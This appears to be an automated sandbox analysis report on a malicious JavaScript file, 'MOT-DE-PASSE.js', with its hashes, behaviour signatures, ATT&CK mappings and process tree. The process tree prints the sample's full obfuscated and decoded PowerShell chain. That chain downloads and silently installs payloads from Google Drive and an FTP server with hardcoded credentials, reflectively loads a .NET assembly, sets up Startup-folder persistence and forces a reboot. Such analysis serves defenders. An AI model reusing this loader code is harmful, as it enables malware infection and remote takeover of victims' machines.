914710d214497ca13da8f3ce50aae097c508ac9b45596c1728404a5a85258622

General

Target

MOT-DE-PASSE.js
Size

24KB
MD5

3568415c8644c0e6a231927bb26c3307
SHA1

3cdece2baabd90c46b4b10d8fc14dfbbc7352651
SHA256

914710d214497ca13da8f3ce50aae097c508ac9b45596c1728404a5a85258622
SHA512

465238863185d29bede8da70f823d1ac78874768962a726b1262f65411547cd9d2502d78ea5633642b2a26cbeb754ea1c174d4fcf0229d99035fd5c0a98227fe
SSDEEP

768:mUj6N48QwfUtVRd64neTcgc0N4DnW2N2Tcc4Hg/0IeSpQYQBcRRuv1mcifM+oQ4a:AfGefZD/MFiZ

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MOT-DE-PASSE.js	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MOT-DE-PASSE.js	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2424	powershell.exe
1480	powershell.exe
2596	powershell.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1480	powershell.exe
2424	powershell.exe
2780	powershell.exe
2596	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1480	powershell.exe
Token: SeDebugPrivilege	2424	powershell.exe
Token: SeDebugPrivilege	2780	powershell.exe
Token: SeDebugPrivilege	2596	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2172 wrote to memory of 1480	2172	wscript.exe	31
PID 2172 wrote to memory of 1480	2172	wscript.exe	31
PID 2172 wrote to memory of 1480	2172	wscript.exe	31
PID 1480 wrote to memory of 2424	1480	powershell.exe	33
PID 1480 wrote to memory of 2424	1480	powershell.exe	33
PID 1480 wrote to memory of 2424	1480	powershell.exe	33
PID 2424 wrote to memory of 2780	2424	powershell.exe	34
PID 2424 wrote to memory of 2780	2424	powershell.exe	34
PID 2424 wrote to memory of 2780	2424	powershell.exe	34
PID 2780 wrote to memory of 2836	2780	powershell.exe	35
PID 2780 wrote to memory of 2836	2780	powershell.exe	35
PID 2780 wrote to memory of 2836	2780	powershell.exe	35
PID 2424 wrote to memory of 2596	2424	powershell.exe	36
PID 2424 wrote to memory of 2596	2424	powershell.exe	36
PID 2424 wrote to memory of 2596	2424	powershell.exe	36

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2172
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $fLbjh = 'JA' + [char]66 + 'UAFEATQ' + [char]66 + 'kAEYAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAVA' + [char]66 + 'RAE0AZA' + [char]66 + 'GACAAKQAgAHsAJA' + [char]66 + 'NAGkAUg' + [char]66 + 'JAGQAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAE0AaQ' + [char]66 + 'SAEkAZAAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'SAFkARQ' + [char]66 + 'hAEYAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAcw' + [char]66 + 'CAGkAaQ' + [char]66 + 'XACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAcw' + [char]66 + 'CAGkAaQ' + [char]66 + 'XACAAKQAgAHsAJA' + [char]66 + 'SAFkARQ' + [char]66 + 'hAEYAIAA9ACAAKAAkAFIAWQ' + [char]66 + 'FAGEARgAgACsAIAAnADEATg' + [char]66 + 'hAHEAZA' + [char]66 + 'OAFgAaQ' + [char]66 + 'HAHYASQ' + [char]66 + 'fAHEAMQ' + [char]66 + 'SAFAAaw' + [char]66 + 'hAHoARg' + [char]66 + '0AE0AeQ' + [char]66 + 'nAG0AYQ' + [char]66 + 'xAFQASg' + [char]66 + 'YAHUANAAyACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAFIAWQ' + [char]66 + 'FAGEARgAgAD0AIAAoACQAUg' + [char]66 + 'ZAEUAYQ' + [char]66 + 'GACAAKwAgACcAMQ' + [char]66 + 'nADEAag' + [char]66 + 'tAFgAdQ' + [char]66 + 'zAFgAOQ' + [char]66 + 'tAGMAOQ' + [char]66 + 'WAG0AaA' + [char]66 + 'WAHIASg' + [char]66 + 'KADIAWA' + [char]66 + 'vAGYAWgAzAGEASw' + [char]66 + 'fAGMATA' + [char]66 + 'PAHQAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + '5AEgASg' + [char]66 + 'oAHgAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + '5AEgASg' + [char]66 + 'oAHgALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + '5AEgASg' + [char]66 + 'oAHgALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQARg' + [char]66 + 'pAGwAZQAoACQAVQ' + [char]66 + 'SAEwASw' + [char]66 + 'CACwAIAAkAE0AaQ' + [char]66 + 'SAEkAZAAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApACAAOwAkAEEAVQ' + [char]66 + 'yAEcARgAgAD0AIAAoACAAJw' + [char]66 + 'DADoAXA' + [char]66 + 'VAHMAZQ' + [char]66 + 'yAHMAXAAnACAAKwAgAFsARQ' + [char]66 + 'uAHYAaQ' + [char]66 + 'yAG8Abg' + [char]66 + 'tAGUAbg' + [char]66 + '0AF0AOgA6AFUAcw' + [char]66 + 'lAHIATg' + [char]66 + 'hAG0AZQAgACkAOw' + [char]66 + 'JAHoAag' + [char]66 + '' + [char]66 + 'AFEAIAA9ACAAKAAgACQATQ' + [char]66 + 'pAFIASQ' + [char]66 + 'kACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACAAKQAgADsAIA' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + '3AHUAcw' + [char]66 + 'hAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + 'JAHoAag' + [char]66 + '' + [char]66 + 'AFEAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQAQQ' + [char]66 + 'VAHIARw' + [char]66 + 'GACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ADsAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAHIAdg' + [char]66 + 'pAGMAZQ' + [char]66 + 'QAG8AaQ' + [char]66 + 'uAHQATQ' + [char]66 + 'hAG4AYQ' + [char]66 + 'nAGUAcg' + [char]66 + 'dADoAOg' + [char]66 + 'TAGUAYw' + [char]66 + '1AHIAaQ' + [char]66 + '0AHkAUA' + [char]66 + 'yAG8AdA' + [char]66 + 'vAGMAbw' + [char]66 + 'sACAAPQAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'OAGUAdAAuAFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAVA' + [char]66 + '5AHAAZQ' + [char]66 + 'dADoAOg' + [char]66 + 'UAGwAcwAxADIAOwAkAGgAcA' + [char]66 + '4AGUAIAA9ACAAKA' + [char]66 + 'OAGUAdwAtAE8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0ACAATg' + [char]66 + 'lAHQALg' + [char]66 + 'XAGUAYg' + [char]66 + 'DAGwAaQ' + [char]66 + 'lAG4AdAApADsAJA' + [char]66 + 'oAHAAeA' + [char]66 + 'lAC4ARQ' + [char]66 + 'uAGMAbw' + [char]66 + 'kAGkAbg' + [char]66 + 'nACAAPQAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'UAGUAeA' + [char]66 + '0AC4ARQ' + [char]66 + 'uAGMAbw' + [char]66 + 'kAGkAbg' + [char]66 + 'nAF0AOgA6AFUAVA' + [char]66 + 'GADgAOwAkAGgAcA' + [char]66 + '4AGUALg' + [char]66 + 'DAHIAZQ' + [char]66 + 'kAGUAbg' + [char]66 + '0AGkAYQ' + [char]66 + 'sAHMAIAA9ACAAbg' + [char]66 + 'lAHcALQ' + [char]66 + 'vAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'OAGUAdA' + [char]66 + '3AG8Acg' + [char]66 + 'rAEMAcg' + [char]66 + 'lAGQAZQ' + [char]66 + 'uAHQAaQ' + [char]66 + 'hAGwAKAAoAC0Aag' + [char]66 + 'vAGkAbgAgAFsAYw' + [char]66 + 'oAGEAcg' + [char]66 + 'bAF0AXQAoADEAMAAwACwAMQAwADEALAAxADEANQAsADkAOQAsADEAMAA3ACwAMQAxADgALAA5ADgALAAxADEANAAsADkANwAsADEAMQA2ACwANAA5ACkAKQAsACcAZA' + [char]66 + 'lAHYAZQ' + [char]66 + 'sAG8AcA' + [char]66 + 'lAHIAcA' + [char]66 + 'yAG8AMgAxADUANwA4AEoAcA' + [char]66 + 'AAEAAJwApADsAJA' + [char]66 + 'WAHQAYQ' + [char]66 + '' + [char]66 + 'AEYAIAA9ACAAJA' + [char]66 + 'oAHAAeA' + [char]66 + 'lAC4ARA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kAFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAnAGYAdA' + [char]66 + 'wADoALwAvAGQAZQ' + [char]66 + 'zAGMAaw' + [char]66 + '2AGIAcg' + [char]66 + 'hAHQAMQ' + [char]66 + 'AAGYAdA' + [char]66 + 'wAC4AZA' + [char]66 + 'lAHMAYw' + [char]66 + 'rAHYAYg' + [char]66 + 'yAGEAdAAuAGMAbw' + [char]66 + 'tAC4AYg' + [char]66 + 'yAC8AVQ' + [char]66 + 'wAGMAcg' + [char]66 + '5AHAAdA' + [char]66 + 'lAHIALwAwADIALw' + [char]66 + 'EAEwATAAwADEALg' + [char]66 + '0AHgAdAAnACAAKQA7ACQAaA' + [char]66 + 'wAHgAZQAuAGQAaQ' + [char]66 + 'zAHAAbw' + [char]66 + 'zAGUAKAApADsAJA' + [char]66 + 'oAHAAeA' + [char]66 + 'lACAAPQAgACgATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAKQA7ACQAaA' + [char]66 + 'wAHgAZQAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ADsAJA' + [char]66 + 'WAHQAYQ' + [char]66 + '' + [char]66 + 'AEYAIAA9ACAAJA' + [char]66 + 'oAHAAeA' + [char]66 + 'lAC4ARA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kAFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAFYAdA' + [char]66 + 'hAEEARgAgACkAOw' + [char]66 + 'bAEIAeQ' + [char]66 + '0AGUAWw' + [char]66 + 'dAF0AIAAkAFIAWA' + [char]66 + 'pAFYAag' + [char]66 + 'fAFkAbA' + [char]66 + '0AEgASwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAFYAdA' + [char]66 + 'hAEEARgAuAFIAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'jAGUAKAAgACcAkyE6AJMhJwAgACwAIAAnAEEAJwAgACkAIAApADsAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEEAcA' + [char]66 + 'wAEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAF0AOgA6AEMAdQ' + [char]66 + 'yAHIAZQ' + [char]66 + 'uAHQARA' + [char]66 + 'vAG0AYQ' + [char]66 + 'pAG4ALg' + [char]66 + 'MAG8AYQ' + [char]66 + 'kACgAIAAkAFIAWA' + [char]66 + 'pAFYAag' + [char]66 + 'fAFkAbA' + [char]66 + '0AEgASwAgACkALg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAHkAcA' + [char]66 + 'lACgAIAAnAEMAbA' + [char]66 + 'hAHMAcw' + [char]66 + 'MAGkAYg' + [char]66 + 'yAGEAcg' + [char]66 + '5ADMALg' + [char]66 + 'DAGwAYQ' + [char]66 + 'zAHMAMQAnACAAKQAuAEcAZQ' + [char]66 + '0AE0AZQ' + [char]66 + '0AGgAbw' + [char]66 + 'kACgAIAAnAHAAcg' + [char]66 + 'GAFYASQAnACAAKQAuAEkAbg' + [char]66 + '2AG8Aaw' + [char]66 + 'lACgAJA' + [char]66 + 'uAHUAbA' + [char]66 + 'sACwAIA' + [char]66 + 'bAG8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0AFsAXQ' + [char]66 + 'dACAAKAAgACcASw' + [char]66 + 'RAGQAVg' + [char]66 + 'jADYARwA2AC8Adw' + [char]66 + 'hAHIALw' + [char]66 + 'tAG8AYwAuAG4AaQ' + [char]66 + 'iAGUAdA' + [char]66 + 'zAGEAcAAvAC8AOg' + [char]66 + 'zAHAAdA' + [char]66 + '0AGgAJwAgACwAIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAsACAAJw' + [char]66 + '0AHIAdQ' + [char]66 + 'lACcAIAApACAAKQA7AH0AOwA=';$fLbjh = $fLbjh.replace('㍿','B') ;$fLbjh = [System.Convert]::FromBase64String( $fLbjh ) ;;;$fLbjh = [System.Text.Encoding]::Unicode.GetString( $fLbjh ) ;$fLbjh = $fLbjh.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js') ;powershell $fLbjh
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1480
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$TQMdF = $host.Version.Major.Equals(2);If ( $TQMdF ) {$MiRId = [System.IO.Path]::GetTempPath();del ($MiRId + '\Upwin.msu');$RYEaF = 'https://drive.google.com/uc?export=download&id=';$sBiiW = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $sBiiW ) {$RYEaF = ($RYEaF + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$RYEaF = ($RYEaF + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yHJhx = ( New-Object Net.WebClient ) ;$yHJhx.Encoding = [System.Text.Encoding]::UTF8 ;$yHJhx.DownloadFile($URLKB, $MiRId + '\Upwin.msu') ;$AUrGF = ( 'C:\Users\' + [Environment]::UserName );IzjAQ = ( $MiRId + '\Upwin.msu' ) ; powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$hpxe = (New-Object Net.WebClient);$hpxe.Encoding = [System.Text.Encoding]::UTF8;$hpxe.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$VtaAF = $hpxe.DownloadString( 'ftp://[email protected]/Upcrypter/02/DLL01.txt' );$hpxe.dispose();$hpxe = (New-Object Net.WebClient);$hpxe.Encoding = [System.Text.Encoding]::UTF8;$VtaAF = $hpxe.DownloadString( $VtaAF );[Byte[]] $RXiVj_YltHK = [System.Convert]::FromBase64String( $VtaAF.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $RXiVj_YltHK ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( 'KQdVc6G6/war/moc.nibetsap//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js', 'true' ) );};"
    3⤵
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2424
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe IzjAQ /quiet /norestart
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2780
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" IzjAQ /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:2836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GB8Z7DGO1A1WKS0LTIUT.temp

Filesize
7KB

MD5
4bd28fdc9cca6108ea305766fe686560

SHA1
a225d389e70a7b7ab169ff34f83d8c8c95ea6bf0

SHA256
bc609d1c362bb2888a83e34d74821b181dfdda8398104ebc774a811546274aa8

SHA512
2f7ca206a24bbe218efaa6ab52afd66fa11c2f642365344c35058dab794acdb1be5794b71cd7af41a7c2a206f206eac6a9eee07dfd744025074337d2bf1ed30b

Download Submit
memory/1480-4-0x000007FEF615E000-0x000007FEF615F000-memory.dmp

Filesize
4KB

Download
memory/1480-5-0x000000001B550000-0x000000001B832000-memory.dmp

Filesize
2.9MB

Download
memory/1480-6-0x0000000002890000-0x0000000002898000-memory.dmp

Filesize
32KB

Download
memory/1480-7-0x000007FEF5EA0000-0x000007FEF683D000-memory.dmp

Filesize
9.6MB

Download
memory/1480-8-0x000007FEF5EA0000-0x000007FEF683D000-memory.dmp

Filesize
9.6MB

Download
memory/1480-10-0x000007FEF5EA0000-0x000007FEF683D000-memory.dmp

Filesize
9.6MB

Download
memory/1480-27-0x000007FEF5EA0000-0x000007FEF683D000-memory.dmp

Filesize
9.6MB

Download
memory/1480-28-0x000007FEF615E000-0x000007FEF615F000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing